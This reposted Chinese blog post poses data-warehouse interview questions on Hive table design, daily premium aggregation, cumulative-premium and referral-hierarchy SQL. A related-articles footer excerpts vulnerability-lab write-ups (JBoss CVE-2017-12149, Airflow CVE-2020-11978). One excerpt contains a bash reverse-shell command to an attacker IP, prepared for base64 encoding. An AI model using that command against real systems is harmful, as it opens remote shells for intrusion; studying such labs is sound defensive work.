一份热乎的数据分析(数仓)面试题 | 每天一点点,收获不止一点

news2024/11/15 10:04:35

目录

1. 已有ods层⽤⼾表为ods_online.user_info,有两个字段userid和age,现设计数仓⽤⼾表结构如 下:

2. 设计数据仓库的保单表(⾃⾏命名)

3. 根据上述两表,查询2024年8⽉份,每⽇,业务分类1,业务分类2下的保单量和保费规模

4. 根据保单表,请写⼀段sql求⽤⼾累计投保满5000(>=5000)的投保⽇期(即⽤⼾是在哪天投保累 计满5000元)

5. 推荐表结构如下,请写⼀段sql,根据1层推荐的数据,查找所有⼈之间的推荐层级(如果A推荐B, B推荐C,则A到C就是⼆级推荐;C推荐H,则A到H就是三级推荐),并更新到表中。

~~评论区留言留下你的答案~~

6 我的专栏数分面试题

6.1 客户投保问题

6.2 异常值检测问题 

6.3  无效搜索问题 | 百度面试题

 6.4 区间分布问题

6.5 用户购买行为分析

 6.6 滴滴呼叫订单问题

 6.7 蚂蚁森林低碳生活数据分析

 6.8 快手直播间人员在线分析

6.9 京东电商购物漏斗分析 

6.10 Soul 用户活跃、留存和粘性分析

​6.11 微信-情人节红包流向探索分析

... ...

不局限于以上内容,数字化建设通关指南专栏内容更精彩!!!


1. 已有ods层⽤⼾表为ods_online.user_info,有两个字段userid和age,现设计数仓⽤⼾表结构如 下:

根据数据仓库命名规范给用户维度表命名
字段名字段类型描述
customeridstring用户唯一标识
agebigint用户年龄
age_descstring用户年龄分层(21岁到60岁,每5岁为一个间隔,例如21-25、26-30)
1.1 create :创建⽤⼾维度表(hive)
要求1,建表
要求2,保留最近7⽇分区
1.2 insert :将ods表导⼊建好的⽤⼾维度表

2. 设计数据仓库的保单表(⾃⾏命名)

(保单表)数据范围2024年8月1日至今的新短期付费保险单
字段名字段类型描述
用户唯一标识
产品ID
保单号
保费
投保日期
其他能想到的维度自行补充

3. 根据上述两表,查询2024年8⽉份,每⽇,业务分类1,业务分类2下的保单量和保费规模

4. 根据保单表,请写⼀段sql求⽤⼾累计投保满5000(>=5000)的投保⽇期(即⽤⼾是在哪天投保累 计满5000元)

参考数据如下:Mike是在1/6,John是在1/8,Lisa是在1/4
用户唯一标识保费投保日期
Mike20002024-01-01
Mike20002024-01-02
John30002024-01-02
Lisa50002024-01-04
Mike60002024-01-06
John20002024-01-08
Lisa10002024-01-08

5. 推荐表结构如下,请写⼀段sql,根据1层推荐的数据,查找所有⼈之间的推荐层级(如果A推荐B, B推荐C,则A到C就是⼆级推荐;C推荐H,则A到H就是三级推荐),并更新到表中。

推荐人被推荐人推荐层级
AB1
BC1
AD1
DE1
DF1
CH1

~~评论区留言留下你的答案~~

6 我的专栏数分面试题

6.1 客户投保问题

 数据分析面试题:客户投保问题分析-CSDN博客

6.2 异常值检测问题 

 数据分析面试题:如何分析基于绝对中位差的异常值检测问题?-CSDN博客

6.3  无效搜索问题 | 百度面试题

数据分析面试题:无效搜索问题 | 百度面试题-CSDN博客

 

 6.4 区间分布问题

数据分析面试题:如何分析区间上用户分布情况 | 基于快递单量区间划分的用户分布情况 | 基于TOPN商品区间划分用户浏览情况分析-CSDN博客

6.5 用户购买行为分析

数据分析面试题:用户购买行为及订单统计分析【巴别时代】-CSDN博客

 

 6.6 滴滴呼叫订单问题

数据分析面试题:滴滴-订单呼叫完答率分析_滴滴应答率怎么解决数据分析-CSDN博客

 

 6.7 蚂蚁森林低碳生活数据分析

数据分析面试题:蚂蚁森林低碳生活数据分析_关于低碳生活 数据分析表-CSDN博客 

 

 6.8 快手直播间人员在线分析

数据分析面试题:快手直播间人员在线分析_c# 快手直播间在线人数-CSDN博客

6.9 京东电商购物漏斗分析 

数据分析面试题:京东电商购物漏斗分析-CSDN博客

6.10 Soul 用户活跃、留存和粘性分析

数据分析面试题:Soul 用户活跃、留存和粘性分析_soul留存数据-CSDN博客 

 6.11 微信-情人节红包流向探索分析

数据分析面试题:微信-情人节红包流向探索分析_红包发送方用户的基本信息缺失率有多高?(即有多少红包发送方用户无法在用户基本信-CSDN博客

... ...

不局限于以上内容,数字化建设通关指南专栏内容更精彩!!!

当然,本文只是展示了数据分析面试题部分内容,其余的内容均在我的数字化建设通关指南专栏里,该专栏不局限于数据分析面试题,也有实战技巧的总结,和数仓建模经验的总结,具体参考如下专栏:

数字化建设通关指南_莫叫石榴姐的博客-CSDN博客

 

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2115578.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【反射知识点详解】

Java中的反射(Reflection)是一个非常强大的机制,它允许程序在运行时检查或修改类的行为。这种能力主要通过java.lang.reflect包中的类和接口来实现。 通过反射,Java程序可以动态地创建对象、调用方法、访问字段,以及获…

JS_分支结构

if结构 这里的if结构几乎和JAVA中的一样,需要注意的是 if()中的非空字符串会被认为是trueif()中的非零数字会被认为是trueif()中的非空对象会被认为是true <script> if(false){// 非空字符串 if判断为true console.log(true) }else{ console.log(false) } if(){// 长度…

统计进程的CPU和内存占用(最大,均值,90分位)

本文先通过top采集所有进程的CPU和内存情况并保存到文件&#xff0c;然后提取指定进程的数据&#xff0c;最后通过 python 对采集的数据进行可视化。 一、使用脚本采集top数据 1. 单次top输出如下 2. 编写脚本每隔1秒采集一次top数据保存到文件 #!/bin/bash# 按照年月日十分…

非线性建模问题的线性化思考

很长时间没有提笔写博&#xff0c;近两年来一直从事规划领域方面的研究&#xff0c;在熟悉业务的同时&#xff0c;对规划算法也有了新的看法。相比智能算法的概率性&#xff0c;规划算法对求解的精确性要求更高。 本篇博客将围绕非线性问题如何线性化典型问题&#xff0c;分类归…

协同过滤算法相关答辩问题、代码实现过程

我 | 在这里 ⭐ 全栈开发攻城狮、全网10W粉丝、2022博客之星后端领域Top1、专家博主。 &#x1f393;擅长 指导毕设 | 论文指导 | 系统开发 | 毕业答辩 | 系统讲解等。已指导60位同学顺利毕业 ✈️个人公众号&#xff1a;热爱技术的小郑。回复 Java全套视频教程 或 前端全套视频…

大学新生的学习秘诀:如何学习编程?(文末赠书)

1.为什么要学习编程 大学生学习编程不仅关乎个人技能的提升&#xff0c;还涉及到未来的职业发展、创新能力培养以及适应快速变化的社会需求。 (1)增强就业竞争力 当今数字化时代&#xff0c;编程技能已成为许多行业的必备技能。掌握编程能够让你在求职市场上脱颖而出&#x…

Vulhub Apache Airflow (CVE-2020-11978)

来到目录下初始化数据库 然后开启环境 查看端口访问 访问http://your-ip:8080进入airflow管理端&#xff0c;将example_trigger_target_dag前面的Off改为On&#xff1a; 再点击执行按钮&#xff0c;在Configuration JSON中输入&#xff1a;{"message":"\";…

SwiftUI 中如何花样玩转 SF Symbols 符号动画和过渡特效

概述 作为 Apple 开发中的全栈秃头老码农们&#xff0c;我们不但需要精通代码编写更需要有过硬的界面设计艺术功底。为了解决撸码与撸图严重脱节这一窘境&#xff0c;苹果从 iOS 13&#xff08;macOS 11&#xff09;开始引入了 SF Symbols 字符图形。 有了 SF Symbols&#xf…

【 html+css 绚丽Loading 】000043 太一玄元镜

前言&#xff1a;哈喽&#xff0c;大家好&#xff0c;今天给大家分享htmlcss 绚丽Loading&#xff01;并提供具体代码帮助大家深入理解&#xff0c;彻底掌握&#xff01;创作不易&#xff0c;如果能帮助到大家或者给大家一些灵感和启发&#xff0c;欢迎收藏关注哦 &#x1f495…

ANSA联合ABAQS基于梁单元的螺栓预紧力分析实例

1、在螺栓孔之间创建一个模拟螺栓 ABAQUS界面→AUXILIARIES→bolt→分鳖选择上下两圈节点,这样在螺栓孔中间就会生成一个梁单元。 中键确定,因为螺杆使用的是变形体,所以接下来需要为其创建一个属性: 单击ok,完成虚拟螺栓的创建,该螺栓两端是刚性MPC,中间是弹性的梁单元…

Jboss远程代码执行漏洞(CVE-2017-12149)

还是先开启环境 浏览器访问跟上一个一模一样页面 还是用ysoserial.jar工具 然后准备好反弹shell的命令&#xff0c;需要对其进行base64加密 //反弹shell命令&#xff0c;注意替换为自己的 bash -i >& /dev/tcp/192.168.75.162/6666 0>&1 //base64加密 YmFzaCAt…

git:分支管理

目录 一、分支概念 二、创建分支 三、切换分支 四、合并分支 五、删除分支 六、合并冲突 七、分支管理策略 八、分支策略 九、bug分支 十、强制删除分支 一、分支概念 在版本回退里&#xff0c;每次提交&#xff0c;git都把它们串成一条时间线&#xff0c;这条时间线可以…

基于51单片机的倒计时定时器proteus仿真

地址&#xff1a; https://pan.baidu.com/s/1_Ig_S0KKrba9VAjovDW71g 提取码&#xff1a;1234 仿真图&#xff1a; 芯片/模块的特点&#xff1a; AT89C52/AT89C51简介&#xff1a; AT89C52/AT89C51是一款经典的8位单片机&#xff0c;是意法半导体&#xff08;STMicroelectr…

【Hot100】LeetCode—215. 数组中的第K个最大元素

目录 1- 思路快速选择 2- 实现⭐215. 数组中的第K个最大元素——题解思路 3- ACM实现 原题连接&#xff1a;215. 数组中的第K个最大元素 1- 思路 快速选择 第 k 大的元素的数组下标&#xff1a; int target nums.length - k 1- 根据 partition 分割的区间来判断当前处理方式…

Spring表达式语言(SPEL)(05)

表达式模板 表达式模板允许将文字文本与一个或多个评估块混合。每个评估块都由前缀和后缀字符分隔&#xff0c;默认是#{}。支持实现接口ParserContext自定义前后缀。调用parseExpression()时指定 ParserContext参数如&#xff1a;new TemplateParserContext()&#xff0c;#{}包…

还不会剪音乐?试试这四款在线音频剪辑

音频剪辑很多人都没有接触过。其实这并不是一个难事&#xff0c;我们甚至可以用一些简单的工具来给自己做个简单的BGM&#xff0c;最近我尝试了几款不同的音频剪辑工具。今天就来跟大家分享一下我的使用体验&#xff0c;看看哪款工具更适合你的需求。 一、福昕音频剪辑 网址&…

通信工程学习:什么是FDM频分复用、TDM时分复用、WDM波分复用、CDM码分复用

FDM频分复用、TDM时分复用、WDM波分复用、CDM码分复用 FDM频分复用、TDM时分复用、WDM波分复用、CDM码分复用是通信领域中常见的四种复用技术&#xff0c;它们各自具有不同的特点和应用场景。以下是对这四种复用技术的详细解释&#xff1a; 一、FDM频分复用&#xff08;Frequ…

AIGC6: 走进腾讯数字盛会

图中是一个程序员&#xff0c;去参加一个技术盛会。AI大潮下&#xff0c;五颜六色&#xff0c;各种不确定。 背景 AI对各行各业的冲击越来越大&#xff0c;身处职场的我也能清晰的感受到。 我所在的行业为全球客服外包行业。 业务模式为&#xff1a; 为国际跨境公司提供不同…

强推!创新直发核心!时序分解+优化组合+模型对比!VMD-SSA-Transformer-BiLSTM多变量时间序列预测

强推&#xff01;创新直发核心&#xff01;时序分解优化组合模型对比&#xff01;VMD-SSA-Transformer-BiLSTM多变量时间序列预测 目录 强推&#xff01;创新直发核心&#xff01;时序分解优化组合模型对比&#xff01;VMD-SSA-Transformer-BiLSTM多变量时间序列预测效果一览基…

kubernetes集群部署Zabbix监控平台

一、zabbix介绍 1.zabbix简介 Zabbix是一个基于Web界面的分布式系统监控的企业级开源软件。可以监视各种系统与设备的参数&#xff0c;保障服务器及设备的安全运营。 2.zabbix特点 &#xff08;1&#xff09;安装与配置简单。 &#xff08;2&#xff09;可视化web管理界面。 &a…